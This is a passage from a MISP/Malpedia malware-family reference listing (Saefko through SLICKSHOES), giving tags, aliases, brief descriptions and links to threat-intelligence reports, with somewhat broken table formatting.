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<td><a href="https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html">https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html</a></td>
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Saefko

The tag is: `misp-galaxy:malpedia="Saefko"`

Saefko is also known as:

Table 2424. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko">https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko</a></td>
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SafeNet

The tag is: `misp-galaxy:malpedia="SafeNet"`

SafeNet is also known as:

Table 2425. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet">https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet</a></td>
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SAGE

The tag is: `misp-galaxy:malpedia="SAGE"`

SAGE is also known as:

- Saga

Table 2426. Table References

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SaiGon

FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.

The tag is: `misp-galaxy:malpedia="SaiGon"`

SaiGon is also known as:

Table 2427. Table References

<table>
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Sakula RAT

Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.

The tag is: `misp-galaxy:malpedia="Sakula RAT"`

Sakula RAT is also known as:

- Sakurel

Table 2428. Table References

<table>
<thead>
<tr>
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<tr>
<td><a href="https://www.secureworks.com/research/sakula-malware-family">https://www.secureworks.com/research/sakula-malware-family</a></td>
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Salgorea

The tag is: misp-galaxy:malpedia="Salgorea"

Salgorea is also known as:

- BadCake

Table 2429. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.salgordea">https://malpedia.caad.fkie.fraunhofer.de/details/win.salgordea</a></td>
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Sality

The tag is: misp-galaxy:malpedia="Sality"

Sality is also known as:

Table 2430. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sality">https://malpedia.caad.fkie.fraunhofer.de/details/win.sality</a></td>
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SamoRAT

The tag is: misp-galaxy:malpedia="SamoRAT"

SamoRAT is also known as:

Table 2431. Table References

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SamSam

The tag is: misp-galaxy:malpedia="SamSam"

SamSam is also known as:

• Samas

Table 2432. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-lowell">https://www.secureworks.com/research/threat-profiles/gold-lowell</a></td>
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<td><a href="http://blog.talosintel.com/2016/03/samsam-ransomware.html">http://blog.talosintel.com/2016/03/samsam-ransomware.html</a></td>
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<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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<td><a href="https://www.youtube.com/watch?v=LUxOcpIRxmg">https://www.youtube.com/watch?v=LUxOcpIRxmg</a></td>
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<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
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</tbody>
</table>

Sanny

The tag is: misp-galaxy:malpedia="Sanny"

Sanny is also known as:

• Daws
Table 2433. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny
http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html

SappyCache

The tag is: misp-galaxy:malpedia="SappyCache"

SappyCache is also known as:

Table 2434. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache
https://blog.alyac.co.kr/m/2219
https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails
https://blog.alyac.co.kr/2219

Sarhust

The tag is: misp-galaxy:malpedia="Sarhust"

Sarhust is also known as:

• ENDCMD
• Hussarini

Table 2435. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust
https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a
Sasfis

Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.

The tag is: misp-galaxy:malpedia="Sasfis"

Sasfis is also known as:

- Oficla

Table 2436. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis">https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis</a></td>
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<tr>
<td><a href="https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html">https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html</a></td>
</tr>
</tbody>
</table>

Satan Ransomware

The tag is: misp-galaxy:malpedia="Satan Ransomware"

Satan Ransomware is also known as:

- 5ss5c
- DBGer
- Lucky Ransomware

Table 2437. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.satan">https://malpedia.caad.fkie.fraunhofer.de/details/win.satan</a></td>
</tr>
<tr>
<td><a href="https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html">https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html</a></td>
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Satana

The tag is: `misp-galaxy:malpedia="Satana"`

Satana is also known as:

Table 2438. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.satana">https://malpedia.caad.fkie.fraunhofer.de/details/win.satana</a></td>
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<tr>
<td><a href="https://blog.reversinglabs.com/blog/retread-ransomware">https://blog.reversinglabs.com/blog/retread-ransomware</a></td>
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<tr>
<td><a href="https://www.cylance.com/threat-spotlight-satan-raas">https://www.cylance.com/threat-spotlight-satan-raas</a></td>
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Satellite Turla

The tag is: `misp-galaxy:malpedia="Satellite Turla"`

Satellite Turla is also known as:

Table 2439. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla">https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla</a></td>
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Sathurbot

The tag is: `misp-galaxy:malpedia="Sathurbot"`

Sathurbot is also known as:

Table 2440. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot</a></td>
</tr>
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</table>
ScanPOS

The tag is: misp-galaxy:malpedia="ScanPOS"

ScanPOS is also known as:

Table 2441. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos
https://securitykitten.github.io/2016/11/15/scanpos.html

Scarabey

Ransomware with ransomnote in Russian and encryption extension .scarab.

The tag is: misp-galaxy:malpedia="Scarabey"

Scarabey is also known as:

• MVP
• Scarab
• Scarab-Russian

Table 2442. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey
https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html

Scarab Ransomware

The tag is: misp-galaxy:malpedia="Scarab Ransomware"

Scarab Ransomware is also known as:

Table 2443. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom
Schneiken

Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.

The tag is: misp-galaxy:malpedia="Schneiken"

Schneiken is also known as:

Table 2444. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken
https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb
https://github.com/vithakur/schneiken

Scote

The tag is: misp-galaxy:malpedia="Scote"

Scote is also known as:

Table 2445. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scote

Scranos

The tag is: misp-galaxy:malpedia="Scranos"

Scranos is also known as:

Table 2446. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos
ScreenLocker

The tag is: *misp-galaxy:malpedia=*"ScreenLocker"

ScreenLocker is also known as:

Table 2447. Table References

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SDBbot

The tag is: *misp-galaxy:malpedia=*"SDBbot"

SDBbot is also known as:

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<td><a href="https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824">https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824</a></td>
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<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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SEADADDY

The tag is: *misp-galaxy:malpedia*="SEADADDY"

SEADADDY is also known as:

- SeaDuke
- Seadask

Table 2449. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy">https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy</a></td>
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<td><a href="https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments">https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</a></td>
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<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
</tr>
<tr>
<td><a href="https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/">https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/">https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/</a></td>
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<tr>
<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html</a></td>
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SeaSalt

The tag is: *misp-galaxy:malpedia*="SeaSalt"

SeaSalt is also known as:

Table 2450. Table References

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1009
### SectopRAT

The tag is: `misp-galaxy:malpedia="SectopRAT"`

SectopRAT is also known as:

- 1xxbot
- ArechClient

**Table 2451. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat</a></td>
</tr>
<tr>
<td><a href="https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html">https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html</a></td>
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### SeDll

The tag is: `misp-galaxy:malpedia="SeDll"`

SeDll is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll">https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll</a></td>
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<td><a href="https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/">https://www.recordedfuture.com/chinese-threat-actor-tempperiscope/</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-mohawk">https://www.secureworks.com/research/threat-profiles/bronze-mohawk</a></td>
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### Sedreco

The tag is: `misp-galaxy:malpedia="Sedreco"`

Sedreco is also known as:

- azzy
• eviltoss

Table 2453. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco">https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco</a></td>
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<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt28-collection-of-samples.html</a></td>
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<td><a href="http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html">http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html</a></td>
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<td><a href="http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf">http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf</a></td>
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<td><a href="https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/">https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/iron-twilight">https://www.secureworks.com/research/threat-profiles/iron-twilight</a></td>
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<td><a href="https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/">https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/</a></td>
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Seduploader

The tag is: `misp-galaxy:malpedia="Seduploader"`

Seduploader is also known as:

• carberplike
• downrage
• jhuhugit
• jkeyskw

Table 2454. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader">https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html">https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html</a></td>
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<tr>
<td><a href="https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/">https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/</a></td>
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seinup

The tag is: misp-galaxy:malpedia="seinup"

seinup is also known as:

Table 2455. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup">https://malpedia.caad.fkie.fraunhofer.de/details/win.seinup</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html">https://www.fireeye.com/blog/threat-research/2013/06/trojan-apt-seinup-hitting-asean.html</a></td>
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Sekhmet Ransomware

The tag is: misp-galaxy:malpedia="Sekhmet Ransomware"

Sekhmet Ransomware is also known as:

Table 2456. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet">https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html">https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html</a></td>
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<td><a href="https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis">https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis</a></td>
</tr>
<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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SendSafe

The tag is: misp-galaxy:malpedia="SendSafe"

SendSafe is also known as:

Table 2457. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe">https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe</a></td>
</tr>
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</table>

SepSys Ransomware

The tag is: misp-galaxy:malpedia="SepSys Ransomware"

SepSys Ransomware is also known as:

• Silvertor Ransomware

Table 2458. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys">https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys</a></td>
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<tr>
<td><a href="https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html">https://id-ransomware.blogspot.com/2020/02/sepsys-ransomware.html</a></td>
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Sepulcher

The tag is: misp-galaxy:malpedia="Sepulcher"

Sepulcher is also known as:

Table 2459. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher">https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher</a></td>
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Serpico

The tag is: misp-galaxy:malpedia="Serpico"
Serpico is also known as:

Table 2460. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico">https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico</a></td>
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</table>

**ServHelper**

ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.

ProofPoint noticed two distinct variant - "tunnel" and "downloader" (citation): “The ‘tunnel’ variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to ‘hijack’ legitimate user accounts or their web browser profiles and use them as they see fit. The ‘downloader’ variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.”

The tag is: misp-galaxy:malpedia="ServHelper"

ServHelper is also known as:

Table 2461. Table References

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<td><a href="https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners">https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners</a></td>
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<td><a href="https://insights.oem.avira.com/ta505-apt-group-targets-americas/">https://insights.oem.avira.com/ta505-apt-group-targets-americas/</a></td>
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<td><a href="https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/">https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/</a></td>
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<td><a href="https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/">https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/</a></td>
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shadowhammer

The tag is: misp-galaxy:malpedia="shadowhammer"

shadowhammer is also known as:

- DAYJOB

Table 2462. Table References

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<td><a href="https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/">https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/</a></td>
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<td><a href="https://mauronz.github.io/shadowhammer-backdoor">https://mauronz.github.io/shadowhammer-backdoor</a></td>
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<td><a href="https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/">https://blog.f-secure.com/a-hammer-lurking-in-the-shadows/</a></td>
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<td><a href="https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/">https://norfolkinfosec.com/possible-shadowhammer-targeting-low-confidence/</a></td>
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<td><a href="https://blog.reversinglabs.com/blog/forging-the-shadowhammer">https://blog.reversinglabs.com/blog/forging-the-shadowhammer</a></td>
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<td><a href="https://securelist.com/operation-shadowhammer/89992/">https://securelist.com/operation-shadowhammer/89992/</a></td>
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<td><a href="https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/">https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/</a></td>
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</table>
**ShadowPad**

The tag is: `misp-galaxy:malpedia="ShadowPad"`

ShadowPad is also known as:

- POISONPLUG.SHADOW
- XShellGhost

*Table 2463. Table References*

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<td><a href="https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/">https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/</a></td>
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<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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<td><a href="https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf">https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf</a></td>
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</table>

**Shakti**

The tag is: `misp-galaxy:malpedia="Shakti"`

Shakti is also known as:
SHAPESHIFT

The tag is: misp-galaxy:malpedia="SHAPESHIFT"

SHAPESHIFT is also known as:

Table 2464. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti">https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti</a></td>
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shareip

The tag is: misp-galaxy:malpedia="shareip"

shareip is also known as:

• remotecmd

SHARPKNOT

The tag is: misp-galaxy:malpedia="SHARPKNOT"

SHARPKNOT is also known as:

• Bitrep

Table 2466. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip">https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip</a></td>
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Table 2467. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot">https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot</a></td>
</tr>
<tr>
<td><a href="https://eromang.zataz.com/tag/agentbase-exe/">https://eromang.zataz.com/tag/agentbase-exe/</a></td>
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</table>
SharpStage

The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east.

The tag is: misp-galaxy:malpedia="SharpStage"

SharpStage is also known as:

Table 2468. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage">https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstage</a></td>
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SHARPSTATS

The tag is: misp-galaxy:malpedia="SHARPSTATS"

SHARPSTATS is also known as:

Table 2469. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats">https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpstats</a></td>
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<tr>
<td><a href="https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf">https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf</a></td>
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ShellLocker

The tag is: misp-galaxy:malpedia="ShellLocker"

ShellLocker is also known as:

Table 2470. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker</a></td>
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<tr>
<td><a href="https://twitter.com/JaromirHorejsi/status/813726714228604928">https://twitter.com/JaromirHorejsi/status/813726714228604928</a></td>
</tr>
</tbody>
</table>
**Shifu**

Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.

The tag is: `misp-galaxy:malpedia="Shifu"`

Shifu is also known as:

**Table 2471. Table References**

<table>
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<tr>
<th>Links</th>
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<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
</tbody>
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**Shim RAT**

The tag is: `misp-galaxy:malpedia="Shim RAT"`

Shim RAT is also known as:

**Table 2472. Table References**

<table>
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<tr>
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<tr>
<td><a href="https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf">https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-walker">https://www.secureworks.com/research/threat-profiles/bronze-walker</a></td>
</tr>
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</table>

**SHIPSHAPE**

SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

The tag is: `misp-galaxy:malpedia="SHIPSHAPE"`

SHIPSHAPE is also known as:

**Table 2473. Table References**

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Shujin

The tag is: misp-galaxy:malpedia="Shujin"

Shujin is also known as:

Table 2474. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin">https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin</a></td>
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Shurl0ckr

The tag is: misp-galaxy:malpedia="Shurl0ckr"

Shurl0ckr is also known as:

Table 2475. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr">https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr</a></td>
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Shylock

The tag is: misp-galaxy:malpedia="Shylock"

Shylock is also known as:

• Caphaw

Table 2476. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock">https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock</a></td>
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1020
SideWinder

The tag is: *misp-galaxy:malpedia=*SideWinder*

SideWinder is also known as:

Table 2477. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder">https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder</a></td>
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<td><a href="https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/">https://ti.qianxin.com/blog/articles/the-recent-rattlesnake-apt-organized-attacks-on-neighboring-countries-and-regions/</a></td>
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<td><a href="https://www.secrss.com/articles/26507">https://www.secrss.com/articles/26507</a></td>
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<td><a href="https://s.tencent.com/research/report/659.html">https://s.tencent.com/research/report/659.html</a></td>
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<td><a href="https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c">https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c</a></td>
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<tr>
<td><a href="https://s.tencent.com/research/report/479.html">https://s.tencent.com/research/report/479.html</a></td>
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Sierra(Alfa, Bravo, ...) 

The tag is: *misp-galaxy:malpedia=*Sierra(Alfa, Bravo, ...)*

Sierra(Alfa, Bravo, ...) is also known as:

- Destover

Table 2478. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras">https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/nickel-academy">https://www.secureworks.com/research/threat-profiles/nickel-academy</a></td>
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Siggen6

The tag is: `misp-galaxy:malpedia="Siggen6"`

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6">https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6</a></td>
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sihost

The tag is: `misp-galaxy:malpedia="sihost"`

sihost is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost">https://malpedia.caad.fkie.fraunhofer.de/details/win.sihost</a></td>
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<td><a href="https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/">https://threatrecon.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists/</a></td>
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Silence

The tag is: `misp-galaxy:malpedia="Silence"`

Silence is also known as:

- TrueBot

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.silence">https://malpedia.caad.fkie.fraunhofer.de/details/win.silence</a></td>
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<tr>
<td><a href="https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/">https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/</a></td>
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Silon

The tag is: `misp-galaxy:malpedia="Silon"`

Silon is also known as:

Table 2482. Table References

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Siluhdur

The tag is: `misp-galaxy:malpedia="Siluhdur"`

Siluhdur is also known as:

Table 2483. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur">https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur</a></td>
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Simda

The tag is: `misp-galaxy:malpedia="Simda"`

Simda is also known as:

- iBank
**SimpleFileMover**

The tag is: `misp-galaxy:malpedia="SimpleFileMover"`

SimpleFileMover is also known as:

**Sinowal**

The tag is: `misp-galaxy:malpedia="Sinowal"`

Sinowal is also known as:

- Anserin
- Mebroot
- Quarian
- Theola
- Torpig
**Sisfader**

The tag is: `misp-galaxy:malpedia="Sisfader"`

Sisfader is also known as:

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader">https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader</a></td>
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<td><a href="https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4">https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4</a></td>
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**Skimer**

The tag is: `misp-galaxy:malpedia="Skimer"`

Skimer is also known as:

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer">https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer</a></td>
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<tr>
<td><a href="http://atm.cybercrime-tracker.net/index.php">http://atm.cybercrime-tracker.net/index.php</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html">https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html</a></td>
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**skip-2.0**

A Microsoft SQL Server backdoor

The tag is: `misp-galaxy:malpedia="skip-2.0"`
skip-2.0 is also known as:

Table 2489. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20">https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/">https://www.welivesecurity.com/2019/10/21/winnti-group-skip2-0-microsoft-sql-server-backdoor/</a></td>
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**Skipper**

The tag is: *misp-galaxy:malpedia="Skipper"*

Skipper is also known as:

Table 2490. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper">https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-hunter">https://www.secureworks.com/research/threat-profiles/iron-hunter</a></td>
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<td><a href="https://securelist.com/shedding-skin-turlas-fresh-faces/88069/">https://securelist.com/shedding-skin-turlas-fresh-faces/88069/</a></td>
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<tr>
<td><a href="https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/">https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/">https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/</a></td>
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**Skyplex**

The tag is: *misp-galaxy:malpedia="Skyplex"*

Skyplex is also known as:

Table 2491. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex">https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex</a></td>
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Slave

The tag is: misp-galaxy:malpedia="Slave"

Slave is also known as:

Table 2492. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.slave

SLICKSHOES

The tag is: misp-galaxy:malpedia="SLICKSHOES"

SLICKSHOES is also known as:

